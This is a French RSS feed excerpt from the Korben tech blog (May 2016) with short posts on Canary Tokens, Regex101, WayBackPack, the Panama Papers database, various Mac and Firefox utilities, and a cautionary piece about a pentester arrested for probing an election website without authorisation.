Cet article merveilleux et sans aucun égal intitulé : Conférence QueDuWeb – Les mouettes, la mer et moi ;-) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Canary Tokens – Un outil pour savoir si on vous espionne]]> http://korben.info/?p=78162 2016-05-11T12:16:20Z 2016-05-11T11:30:59Z Êtes-vous espionné ? Quelqu'un lit-il vos emails ? Êtes-vous certain que personne d'autre que vous n'accède à votre Dropbox ? Comment être sûr que personne ne consulte les documents que vous stockez sur votre ordinateur ? Pas simple ! Et pourtant, il existe une solution : Canary Tokens. Pour ceux qui ne connaitraient pas encore > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Canary Tokens – Un outil pour savoir si on vous espionne ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Êtes-vous espionné ? Quelqu'un lit-il vos emails ? Êtes-vous certain que personne d'autre que vous n'accède à votre Dropbox ? Comment être sûr que personne ne consulte les documents que vous stockez sur votre ordinateur ?

Pas simple !

Et pourtant, il existe une solution : Canary Tokens.

Pour ceux qui ne connaitraient pas encore le concept du canari, je vous l'explique en quelques mots. Un canari est un marqueur (un lien, un mot, un token, une phrase, une image...etc.) que vous mettez quelque part sur la toile et auquel vous ne touchez plus sauf si vous êtes compromis d'une manière ou d'une autre.

Imaginons par exemple que je vous propose de télécharger et utiliser un outil de chiffrement de mon cru. Vous avez confiance en cet outil, mais si quelqu'un me force à y mettre une backdoor, vous ne le saurez pas, car j'aurai probablement signé un papier qui m'oblige à me taire à ce sujet. Ça se passe surtout comme ça aux États-Unis comme on l'a vu dans l'affaire Lavabit et bien d'autres.

Mais j'avais prévu le coup... J'avais mis en place un canari sur l'une des pages de mon site qui disait par exemple : "Ma couleur préférée est le jaune". Ça faisait des années que cette phrase n'avait pas bougé, la plupart des gens autour de moi connaissent l'existence de ce canari, et lorsque mon outil a été compromis, j'ai alors pris soin de supprimer ou modifier cette phrase anodine.

Ceux qui surveillent ce canari sont alors informés qu'il y a un souci. De mon côté, je n'ai rien communiqué, mais le message a quand même réussi à passer.

Voilà en gros ce qu'est un Canari. Un moyen d'alerter les gens quand on ne peut pas le faire.

Dans le cas du service Canary Tokens, c'est un peu différent. Vous entrez votre adresse email, un titre à votre canari et le site vous génère un token (identifiant unique) que vous pouvez alors placer sous la forme d'un lien dans un de vos emails, ou alors récupérer sous la forme de fichiers (Word, PDF) ....

Screenshot 2016-05-11 09.08.40

...qui lorsqu'ils seront ouverts, vous enverrons directement un message d'alerte dans votre boite mail.

Screenshot 2016-05-11 09.12.07

Vous pouvez aussi l'utiliser comme marqueur DNS ou MYSQL, ainsi en cas de lookup dans votre réseau ou d'un update, select, insert ou delete à un certain endroit de votre base de données, vous recevrez une alerte.

Screenshot 2016-05-11 09.27.38

Même chose si quelqu'un parcours vos partages réseau sans autorisation avec un répertoire spécialement conçu pour vous alerter s'il est accédé depuis une machine Windows (grâce à un desktop.ini piégé).

Bref, ce n'est pas spécialement nouveau comme concept, mais c'est top pour les plus paranos ou ceux qui ont des soupçons. Évidemment, le point faible de ce truc, c'est l'URL du canari. Si canarytokens.com est bloqué par votre espion, les alertes ne se déclencheront pas.

Par contre, la bonne nouvelle c'est que vous pouvez vous même héberger le script de CanaryTokens sur votre propre serveur grâce à cette image Docker (ou carrément les sources). Ainsi vous aurez votre propre sous domaine ou domaine réservé à vos Canaris Tokens pour surprendre plus facilement d'éventuels curieux.

Une explication technique plus détaillée sur Canary Tokens est dispo ici.

Cet article merveilleux et sans aucun égal intitulé : Canary Tokens – Un outil pour savoir si on vous espionne ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Whatsapp dispo sur Windows et OSX – Comment scanner le QR code ?]]> http://korben.info/?p=78169 2016-05-11T08:34:24Z 2016-05-11T08:34:24Z Pour ceux que ça intéressent, sachez qu'une version Desktop pour Windows et OSX de Whatsapp est maintenant dispo. Vous pouvez la télécharger ici. Comme pour l'extension navigateur, ces applications natives sont des compléments à l'application mobile. Une fois synchronisé avec un QR Code, votre téléphone et votre ordinateur pourront se synchroniser les messages reçus et > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Whatsapp dispo sur Windows et OSX – Comment scanner le QR code ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Pour ceux que ça intéressent, sachez qu'une version Desktop pour Windows et OSX de Whatsapp est maintenant dispo. Vous pouvez la télécharger ici.

Comme pour l'extension navigateur, ces applications natives sont des compléments à l'application mobile. Une fois synchronisé avec un QR Code, votre téléphone et votre ordinateur pourront se synchroniser les messages reçus et vous pourrez en écrire directement depuis votre ordi.

Alors pour synchroniser vos 2 appareils, il faut d'abord lancer l'application desktop qui lors de son initialisation vous affichera un joli QR Code. Ensuite, allez sur l'application mobile, dans l'onglet Discussion (Disc.) et cliquez sur le menu avec les 3 petits points en haut à droite. Enfin, choisissez "Whatsapp Web" dans le menu.

2016-05-11 08.26.43

Vous pourrez ainsi scanner le QR Code qui s'affiche à l'écran et vos applications seront synchronisées.

Screenshot 2016-05-11 10.27.04

Oui j'ai pas d'amis

Pratique !

Cet article merveilleux et sans aucun égal intitulé : Whatsapp dispo sur Windows et OSX – Comment scanner le QR code ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[FPV AirShow – Ce week end, ne manquez pas le plus gros championnat de course de drones]]> http://korben.info/?p=78160 2016-05-11T06:26:05Z 2016-05-11T08:30:01Z Si vous n'avez rien de prévu ce week-end, sachez que les 13, 14 et 15 mai aura lieu dans le Var le FPV AirShow ! Il s'agit de la plus grosse compétition de drones au monde avec plus de 200 participants. Évidemment, le public est le bienvenu et vous pourrez assister plusieurs épreuves : Course > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : FPV AirShow – Ce week end, ne manquez pas le plus gros championnat de course de drones ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous n'avez rien de prévu ce week-end, sachez que les 13, 14 et 15 mai aura lieu dans le Var le FPV AirShow !

Il s'agit de la plus grosse compétition de drones au monde avec plus de 200 participants. Évidemment, le public est le bienvenu et vous pourrez assister plusieurs épreuves : Course individuelle ou en équipe, freestyle, course de nuit...etc.

L'entrée est gratuite pour le public et il y aura des animations pour toute la famille (initiation au pilotage, tombolas, jeux...etc) et tout ce qu'il faut pour manger sur place (ça, c'est important !!)

Ça se passera sur le domaine du Planet à Pourrières (83910) et j'y serai avec Florian, le meilleur photographe du monde, pour couvrir l'événement et vous raconter tout ça. Je ferai aussi du live sur mon snapchat (korben00). Je pense qu'on va bien se marrer.

Bref, j'espère vous y croiser et qu'il fera super beau !

Cet article merveilleux et sans aucun égal intitulé : FPV AirShow – Ce week end, ne manquez pas le plus gros championnat de course de drones ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Regex101 – L’outil ultime pour trouver, créer, tester et comprendre des regex]]> http://korben.info/?p=78148 2016-05-11T06:02:31Z 2016-05-11T07:30:38Z Si vous aimez vous prendre la tête avec des Regex, voici un site qui devrait vous plaire. Baptisé Regex101, il permet de tester ses expressions régulières ou de les construire à l'aide d'un mémento bien pratique. Mais ce que je préfère sur Regex101, c'est l'encadré "Explication" qui détaille en langage clair (et en anglais), ce que > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Regex101 – L’outil ultime pour trouver, créer, tester et comprendre des regex ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous aimez vous prendre la tête avec des Regex, voici un site qui devrait vous plaire. Baptisé Regex101, il permet de tester ses expressions régulières ou de les construire à l'aide d'un mémento bien pratique. Mais ce que je préfère sur Regex101, c'est l'encadré "Explication" qui détaille en langage clair (et en anglais), ce que fait exactement cette expression régulière.

Screenshot 2016-05-11 07.41.12

Par exemple, si j'indique cette regex qui permet de trouver une URL dans un texte HTML...

<a href=\"([^\"]*)\">(.*)<\/a>

Et bien, il va me la détailler comme ceci :

Screenshot 2016-05-11 07.45.21

Génial si vous n'y comprenez pas grand-chose d'habitude :-)

Tg4pZBe

Et si vous voulez du code pour exploiter votre regex, il peut vous en fournir du tout beau, généré automatiquement pour PHP, Javascript et Python !

Screenshot 2016-05-11 07.47.36

Mais attendez, il y a encore mieux. En cliquant sur le menu Regex Library en haut, vous aurez accès à une bibliothèque contenant des centaines d'expressions régulières. De quoi faire votre choix et vous simplifier la vie sur des choses assez courantes.

Screenshot 2016-05-11 07.42.49

Un très bon outil donc !

Cet article merveilleux et sans aucun égal intitulé : Regex101 – L’outil ultime pour trouver, créer, tester et comprendre des regex ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Panama Papers – La base de données accessible au public]]> http://korben.info/?p=78143 2016-05-10T09:39:01Z 2016-05-10T15:30:51Z Bon, ça ne balance pas les noms, c'est fait proprement et c'est accessible en ligne ici. Les journalistes de l'ICIJ qui ont sorti le scandale des Panama Papers dans la presse du monde entier, viennent de mettre à disposition une base de données que chacun peut consulter. Vous pourrez y voir les noms 320 000 > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Panama Papers – La base de données accessible au public ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Bon, ça ne balance pas les noms, c'est fait proprement et c'est accessible en ligne ici. Les journalistes de l'ICIJ qui ont sorti le scandale des Panama Papers dans la presse du monde entier, viennent de mettre à disposition une base de données que chacun peut consulter.

Vous pourrez y voir les noms 320 000 sociétés offshores ouvertes par Monssack Fonseca ainsi que les noms des boites et ceux des hommes de paille qui détiennent ces sociétés. Vous ne saurez donc pas si votre patron, votre voisin ou votre papa planque son pognon dans un paradis fiscal, ni même les montants. Mais vous pourrez voir certains liens entre ces différentes sociétés et peut-être découvrir de nouvelles choses. Car oui c'est pour avoir un coup de main du grand public que les journalistes de l'ICIJ ont mis en ligne ce site.

Screenshot 2016-05-10 11.19.34

Bref, un peu décevant c'est sûr, mais totalement responsable en termes de divulgation de données. Espérons simplement que la justice aura accès, elle, à l'intégralité des données pour faire son travail et botter le cul des tricheurs.

Source

Cet article merveilleux et sans aucun égal intitulé : Panama Papers – La base de données accessible au public ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[WayBackPack – Pour en finir avec le syndrome du “C’était mieux avant”]]> http://korben.info/?p=78140 2016-05-10T09:17:02Z 2016-05-10T13:30:06Z Il arrive parfois qu'on me dise : "Ton site c'était mieux AVANT"  Mais avant quoi, Monsieur J'laRamène ? Avant que t'arrives de nulle part avec ta remarque en mode prof des Internet ? Avant, quand je ne savais pas écrire 2 mots sans faire de faute (J'ai investi dans un super correcteur depuis ;-)))) ? Avant que > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : WayBackPack – Pour en finir avec le syndrome du “C’était mieux avant” ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Il arrive parfois qu'on me dise :

"Ton site c'était mieux AVANT" 

Mais avant quoi, Monsieur J'laRamène ?

Avant que t'arrives de nulle part avec ta remarque en mode prof des Internet ? Avant, quand je ne savais pas écrire 2 mots sans faire de faute (J'ai investi dans un super correcteur depuis ;-)))) ? Avant que je devienne mondialement connu et que je passe chez Michel Drucker ? Ou avant, quand t'étais encore dans les sacoches de papa ? (Oui, on dit : "de papa"... ceux qui disent "à papa", vous pouvez les bifler).

La vérité, c'est que ce n’était pas mieux avant. C'était soit pareil, soit beaucoup moins bien que maintenant :-) Et pour le vérifier, je vous invite à faire un saut dans les anciens articles du site... vous verrez que depuis 2004, j'aborde sensiblement les mêmes thématiques... sécu, logiciels, vie privée, chiffrement, petites bidouilles et vidéo à la con bien sûr ! Le design était aussi...euh fait maison qu'aujourd'hui et y'avait bien évidemment de la pub dès 2004 (y'en avait même bcp plus que maintenant).

C'était et c'est toujours de la bonne, mec :-)

Mais si toutefois vous n'êtes pas convaincu et que vous aimez vraiment vivre dans le passé, voici un outil en ligne de commande qui s'appelle WayBackPack qui permet de télécharger une archive entière contenant tout le passé d'un site web, grâce à la Wayback Machine que vous connaissez tous !

Pour l'installer :

pip install waybackpack

Et pour l'utiliser, pensez à spécifier un répertoire de stockage (korbenold) et une année après laquelle ça ne vous intéresse plus :

waybackpack korben.info -d ~/Downloads/korbenold --end 2010

Screenshot 2016-05-10 11.01.40

Ainsi vous pourrez surfer en toute zénitude sur des versions du passé de vos sites préférés !

Cet article merveilleux et sans aucun égal intitulé : WayBackPack – Pour en finir avec le syndrome du “C’était mieux avant” ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Hey Siri, vazy bouge ma Tesla !]]> http://korben.info/?p=78138 2016-05-10T08:47:56Z 2016-05-10T11:30:56Z Si vous avez une Tesla, le développeur Sam Gabbay a mis au point une application pour Apple Watch qui permet grâce à Homekit de commander la célèbre voiture électrique. Dans sa vidéo de démo, il présente 2 scénarios. Le premier ouvre la porte du garage et ordonne à la voiture de sortir toute seule. Le > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Hey Siri, vazy bouge ma Tesla ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous avez une Tesla, le développeur Sam Gabbay a mis au point une application pour Apple Watch qui permet grâce à Homekit de commander la célèbre voiture électrique.

Dans sa vidéo de démo, il présente 2 scénarios. Le premier ouvre la porte du garage et ordonne à la voiture de sortir toute seule. Le seconde ouvre la porte du garage et ordonne à la voiture d'entrer dans celui-ci. C'est classe quoi, même si je trouve que Siri est un peu lent au réveil.

Si ce projet vous intéresse, je peux le réaliser pour vous. Envoyez-moi 400 000 euros minimum pour que je m'achète une Tesla (140 000 euros), une nouvelle maison avec un garage (200 000 euros... oui ce n’est pas si cher en Auvergne) et une porte de garage électrique + l'Apple Watch + un peu de matos électrique (60 000 euros). Et promis, je vous ferai une BELLE VIDÉO !

;-)))

Bah quoi ?

Source

Cet article merveilleux et sans aucun égal intitulé : Hey Siri, vazy bouge ma Tesla ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Développez en BASIC sur votre Android]]> http://korben.info/?p=78127 2016-05-10T07:47:04Z 2016-05-10T08:30:52Z La première fois que j'ai mis mes mains dans du code, c'était du BASIC... Et c'était plutôt rigolo... Je devais avoir 13 ans et pas mal de temps. :-) Et voici que je tombe sur RFO BASIC!, un éditeur Android qui permet de coder en Basic classique, de faire tourner vos création directement sur votre > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Développez en BASIC sur votre Android ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
La première fois que j'ai mis mes mains dans du code, c'était du BASIC... Et c'était plutôt rigolo... Je devais avoir 13 ans et pas mal de temps. :-)

Et voici que je tombe sur RFO BASIC!, un éditeur Android qui permet de coder en Basic classique, de faire tourner vos création directement sur votre Android, mais qui en plus permet d'accéder  aux fonctionnalités du téléphone telles que :

  • L'affichage avec support du multi-touch
  • La possibilité de mettre au point des interfaces à base d'HTML et de javascript
  • Les bases SQL
  • Le GPS
  • Les capteurs du téléphone
  • La lecture de musique
  • Le text to speech
  • La reconnaissance vocale
  • L'enregistrement audio
  • Les sonneries
  • La caméra
  • Le chiffrement
  • Le client FTP
  • Le Bluetooth
  • Le TCP/IP
  • Les SMS
  • Les emails
  • Les appels téléphoniques
  • ...etc

Et si vous avez un appareil rooté, il est possible d'initier un accès en super user (root).

2016-05-10 07.23.34
2016-05-10 07.22.15

Le plus beau là dedans, c'est qu'une fois que votre application est développée, vous pouvez la packager et la proposer pourquoi pas, sur le Play Store si le coeur vous en dit.

En tout cas, je trouve ça sympa comme outil. Ça permet de se détendre les doigts quand on s'ennuie et s'initier à un langage de développement ancien et facile. Il y a bien sûr des tas de code d'exemples qui sont fournis avec l'application et qui vous montreront comment exploiter les possibilités de votre appareil Android.

2016-05-10 07.22.52

Exemple de boussole en RFO Basic

Amusez-vous bien !

Cet article merveilleux et sans aucun égal intitulé : Développez en BASIC sur votre Android ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Les erreurs d’un professionnel du pentest]]> http://korben.info/?p=78133 2016-05-10T09:54:03Z 2016-05-10T08:27:42Z David Levin, chercheur en sécurité et CTO de Vanguard Cybersecurity a fait, ce qu'on appelle, une erreur de débutant. En analysant, sans autorisation, le site où les gens peuvent voter pour le prochain chef du Comtée de Lee dans le sud ouest de la Floride, il est tombé sur une jolie faille SQL. Ne pas > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Les erreurs d’un professionnel du pentest ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
David Levin, chercheur en sécurité et CTO de Vanguard Cybersecurity a fait, ce qu'on appelle, une erreur de débutant. En analysant, sans autorisation, le site où les gens peuvent voter pour le prochain chef du Comtée de Lee dans le sud ouest de la Floride, il est tombé sur une jolie faille SQL.

Ne pas avoir l'autorisation comme dans le cadre d'un audit ou d'un bug bounty, c'est donc sa première erreur.

Évidemment, grâce à un outil (Havij) permettant d'automatiser tout ça, il a pu récupérer les noms d'utilisateurs et les mots de passe des employés du bureau des élections.

Pomper la base et récupérer des identifiants, c'est sa seconde erreur... 

Pour être certain d'avoir des ennuis, il a ensuite utilisé certains de ces comptes pour voir à quelles autre genre de données il pouvait accéder.

Utiliser ces mêmes identifiants, paf, troisième erreur !

Pensez-vous qu'il aurait prévenu les officiels du Comté de Lee ? Que nenni ! Il a informé Dan Sinclair, l'un des candidats à ces élections et ils ont eu la bonne idée de faire cette vidéo explicative, montrant ô combien c'est simple d'ouvrir en deux le site des élections.

Et c'est seulement après ça qu'il a averti les responsables du site.

Se faire mousser publiquement et ridiculiser une instance officielle qui a tous les arguments pour contre attaquer... Quatrième et grave erreur !

Alors évidemment, ce site est une passoire, la base n'est pas sécurisée, les mots de passe sont en clair... Bref, c'est de la pure négligence surtout pour un truc qui est censé gérer quelque chose d'aussi important que des élections. Mais ça n'excuse pas ses méthodes assez étrange pour un "pro".

Après que la police ait émis un mandat d'arrêt contre lui, il s'est rendu de lui-même aux autorités et relâché quelques heures plus tard après avoir fait ce joli mugshot et versé 15 000 dollars de caution. Il attend maintenant son procès (vidéo des officiels du Comté de Lee).

635979596506064023-DavidLevin

Des cas comme ça, j'en vois tous les jours. Sur les forums, dans la presse et même dans ma boite mail. Il arrive régulièrement de trouver des failles sur un site. C'est normal. Mais à ce moment, il convient d'adopter la bonne posture pour éviter les ennuis.

Voici d'abord ce qu'il ne faut pas faire (sauf si vous êtes un black hat et que c'est votre business bien sûr ;-))) :

  • Exploiter la faille et sortir des données
  • Donner publiquement des informations sur cette faille
  • Vendre la faille au marché noir

Si vous êtes bien intentionné, votre premier réflexe sera peut-être de contacter le webmaster ou l'un des responsables de la société. ATTENTION ! J'ai déjà vu des gens bien intentionné se prendre un procès parce qu'il ont justement trouvé une faille (sans rien exploiter derrière) et qui l'ont en quelque sorte "avoué" naïvement. C'est donc un risque qui existe. Ne réclamez jamais rien en échange non plus. Si vous demandez de l'argent, du matos, un job...etc. pour vous récompenser d'une faille trouvée, cela peut être pris pour une tentative d'extorsion.

Si vraiment vous ne voulez prendre aucun risque, voici les 3 possibilités :

  • Vous passez votre chemin. L'entreprise n'aura jamais connaissance du problème et celui-ci sera surement exploité plus tard par quelqu'un qui ne sera pas forcement aussi bien intentionné que vous.
  • Vous contactez une instance officielle comme l'ANSSI qui pourra peut-être vous aider.
  • Vous contactez l'ami Zataz via son protocole d'alerte.
  • Ou vous pouvez vérifier si l'entreprise en question dispose d'un programme de Bug Bounty bien cadré. Pour cela, vous pouvez faire une petite recherche sur Firebounty. C'est le seul moyen pour vous de gagner quelque chose en découvrant une faille de sécurité.

Si vous êtes une société, ce que je peux vous recommander, c'est d'être sympa avec les gens qui vous remonte des failles, et cela même si vous n'avez pas encore de programme de Bug Bounty pour anticiper les risques et corriger votre site avant que le bad buzz du siècle ne vous touche. Ne portez pas plainte s'il n'y a pas eu de nuisance... Au contraire, remerciez la personne et corrigez au plus vite.

Dans le cas de David Levin, ce qui est assez troublant, c'est que le mec se décrit comme un professionnel alors qu'il commet toutes ces erreurs. Il a clairement tendu le bâton pour se faire battre et à mon avis, l'élément déclencheur, c'est la vidéo qu'il a réalisée pour se faire de la pub. Je n’ai rien contre ça, mais le risque qu'il a pris, était à l'évidence trop élevé.

Dommage :-(

Source

Cet article merveilleux et sans aucun égal intitulé : Les erreurs d’un professionnel du pentest ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Spectacle – Agencez votre bureau OSX en mode feignasse]]> http://korben.info/?p=78125 2016-05-10T06:31:49Z 2016-05-10T07:30:56Z Voici un soft pour les utilisateurs de Mac que j'ai trouvé bien pratique puisqu'il permet de redimensionner et positionner n'importe quelle fenêtre d'application à l'endroit de votre choix en un clic. Cet outil s'appelle Spectacle, est open source (mais copyrightée) et une fois installée, vous propose le menu suivant : A vous ensuite de vous > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Spectacle – Agencez votre bureau OSX en mode feignasse ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Voici un soft pour les utilisateurs de Mac que j'ai trouvé bien pratique puisqu'il permet de redimensionner et positionner n'importe quelle fenêtre d'application à l'endroit de votre choix en un clic.

Cet outil s'appelle Spectacle, est open source (mais copyrightée) et une fois installée, vous propose le menu suivant :

Screenshot 2016-05-10 08.11.07

A vous ensuite de vous placer sur la fenêtre que vous voulez bouger, puis d'aller dans ce menu et de choisir ce qui vous va le mieux. Ainsi, vous pouvez agencer votre bureau (et bureaux virtuels) comme bon vous semble sans vous prendre la tête. Notez qu'il y a des raccourcis clavier pour chacune des possibilités donc à vous de les mémoriser, et ça sera encore plus rapide !

Screenshot 2016-05-10 08.11.55

Pratique !

Cet article merveilleux et sans aucun égal intitulé : Spectacle – Agencez votre bureau OSX en mode feignasse ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Auto Unload Tab – Pour économiser la mémoire de Firefox]]> http://korben.info/?p=78102 2016-05-09T09:02:01Z 2016-05-09T08:30:33Z Si vous utilisez Firefox et que vous ouvrez genre 1 million d'onglets à chaque fois, et qu'au bout d'un moment, ça fait ramer votre ordinateur, voici une extension parfaitement I-N-D-I-S-P-E-N-S-A-B-L-E. Son nom ? Auto Unload Tab. Bon rien qu'avec le nom, vous avez surement deviné ce qu'elle fait mais je vais quand même vous présenter > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Auto Unload Tab – Pour économiser la mémoire de Firefox ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous utilisez Firefox et que vous ouvrez genre 1 million d'onglets à chaque fois, et qu'au bout d'un moment, ça fait ramer votre ordinateur, voici une extension parfaitement I-N-D-I-S-P-E-N-S-A-B-L-E.

Son nom ? Auto Unload Tab.

Bon rien qu'avec le nom, vous avez surement deviné ce qu'elle fait mais je vais quand même vous présenter rapidement quelques unes de ses fonctionnalités.

Auto Unload Tab permet de configurer une durée au bout de laquelle l'onglet sera "déchargé" (c'est à dire vidé de son contenu et la mémoire libérée). Je vous rassure, si vous recliquez sur l'onglet, le site sur lequel vous étiez se rechargera sans souci.

Vous pouvez aussi programmer une durée pour que l'onglet soit carrément fermé, mettre des sites en liste blanche si vous ne voulez pas les décharger, agir uniquement au-delà d'un certain poids en MB, vider un onglet avec un clic milieu...etc.,etc.

Screenshot 2016-05-09 10.11.33

Il y a vraiment un tas d'options sympas qui vous donneront toute la souplesse nécessaire pour que cela ne vous énerve pas dans votre surf quotidien.

A tester !

Cet article merveilleux et sans aucun égal intitulé : Auto Unload Tab – Pour économiser la mémoire de Firefox ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[26 mai 2016 – Ne manquez pas le B-Day !]]> http://korben.info/?p=78096 2016-05-09T11:13:26Z 2016-05-09T07:46:37Z Alors ce pont de l'Ascension, c'était bien ? Ah vous non plus, vous n'avez pas fait le pont ? Alors si vous avez trainé sur mon Twitter, vous avez surement remarqué que le 26 mai prochain, il allait se passer quelque chose d'énooooorme ! Non, non, pas Mercure qui repasse devant le soleil, ni une > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : 26 mai 2016 – Ne manquez pas le B-Day ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Alors ce pont de l'Ascension, c'était bien ? Ah vous non plus, vous n'avez pas fait le pont ? Alors si vous avez trainé sur mon Twitter, vous avez surement remarqué que le 26 mai prochain, il allait se passer quelque chose d'énooooorme !

Non, non, pas Mercure qui repasse devant le soleil, ni une inversion de pôles. J'ai mieux : Le 26 mai prochain, toute l'équipe de BountyFactory débarque à l'Ecole42 pour le Bug Bounty Day !

Au programme de ce B-Day (On sait aussi faire de bons jeux de mots chez YWH) :

BugBountyDay_BountyFactory.io_-_2016-05-09_13.09.15

Vous l'aurez compris en voyant les confs, cette après-midi est donc clairement orientée décideurs, RSSI, DSI, experts en sécurité...etc qui s'intéressent à la sécurité et au bug bounty. Toute l'équipe et moi-même serons présents pour vous rencontrer, répondre à vos questions et évidemment partager un bon moment avec vous.

Pour demander une invitation, remplissez simplement le formulaire qui se trouve en bas de ce site.

A très vite !

Cet article merveilleux et sans aucun égal intitulé : 26 mai 2016 – Ne manquez pas le B-Day ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[PeerTweet – Un clone de Twitter reposant sur Bittorrent]]> http://korben.info/?p=78065 2016-05-05T03:22:46Z 2016-05-04T11:30:10Z Reposant sur le réseau Bittorrent et plus particulièrement sur la techno DHT (Basé sur une idée d'extension du protocole permettant le support des flux RSS), PeerTweet est un clone de Twitter entièrement décentralisé. Pour chaque utilisateur, il génère un hash unique (l'équivalent de votre nom d'utilisateur) et une clé privée qui vous permet d'envoyer des messages ou > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : PeerTweet – Un clone de Twitter reposant sur Bittorrent ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Reposant sur le réseau Bittorrent et plus particulièrement sur la techno DHT (Basé sur une idée d'extension du protocole permettant le support des flux RSS), PeerTweet est un clone de Twitter entièrement décentralisé.

Pour chaque utilisateur, il génère un hash unique (l'équivalent de votre nom d'utilisateur) et une clé privée qui vous permet d'envoyer des messages ou de réaliser différentes actions sous ce nom (ce hash) unique.

Ainsi, vous pouvez suivre d'autres personnes qui vous auraient envoyée leur hash et bien sûr poster, retweeter, mettre en favoris des messages... Exactement comme sur Twitter. Le plus beau là-dedans, c'est que c'est impossible à censurer.

PeerTweet

Alors bien sûr comme c'est du P2P, c'est lent à cause du manque de monde et l'application est encore un peu basique. Mais l'idée est bonne. Je doute que PeerTweet soit adopté massivement. Toutefois, le jour où Twitter disparait ou se fait censurer pour une raison ou une autre, PeerTweet peut être la solution.

Les sources de PeerTweet sont sur Github et vous pouvez trouver des binaires pour Windows et OSX ici.

Cet article merveilleux et sans aucun égal intitulé : PeerTweet – Un clone de Twitter reposant sur Bittorrent ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Quitter une application OSX après un certain temps d’inactivité]]> http://korben.info/?p=78061 2016-05-04T07:13:46Z 2016-05-04T08:30:52Z Quitter (prononcez à l'américaine "Qwitteur") est un outil pour Mac OSX qui permet de fermer ou masquer automatiquement les applications inutilisées durant un certain laps de temps. On peut imaginer que ça peut aider à réduire le bordel ambiant au niveau des processus, de réduire la charge sur la RAM ou le CPU, mais cela > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Quitter une application OSX après un certain temps d’inactivité ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Quitter (prononcez à l'américaine "Qwitteur") est un outil pour Mac OSX qui permet de fermer ou masquer automatiquement les applications inutilisées durant un certain laps de temps.

quitter

On peut imaginer que ça peut aider à réduire le bordel ambiant au niveau des processus, de réduire la charge sur la RAM ou le CPU, mais cela peut aussi être très pratique si vous avez tendance à vous laisser distraire par certains app, notamment en ce qui concerne les réseaux sociaux. En fermant automatiquement au bout de x minutes un client Twitter, Slack ou un logiciel de mail, cela vous évitera d'y replonger machinalement à chaque message reçu.

A télécharger ici.

source

Cet article merveilleux et sans aucun égal intitulé : Quitter une application OSX après un certain temps d’inactivité ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Et si vous faisiez un tour du monde virtuel ?]]> http://korben.info/?p=78057 2016-05-04T06:51:09Z 2016-05-04T07:30:38Z "Ne vous êtes vous jamais demandé où vous seriez si vous aviez marché droit devant vous chaque jour au lieu de faire vos trajets quotidiens ?" C'est sur cette idée simple que FibreTigre, Tony Truand et Quentin Vijoux ont conçu The Beautiful Walk, un site qui permet de se lancer dans un tour du monde > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Et si vous faisiez un tour du monde virtuel ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
"Ne vous êtes vous jamais demandé où vous seriez si vous aviez marché droit devant vous chaque jour au lieu de faire vos trajets quotidiens ?"

C'est sur cette idée simple que FibreTigre, Tony Truand et Quentin Vijoux ont conçu The Beautiful Walk, un site qui permet de se lancer dans un tour du monde virtuel. 40 000 km à pied tel que Google Map peut le tracer, et qui vous fera passer par tous les continents.

planisphere-hd

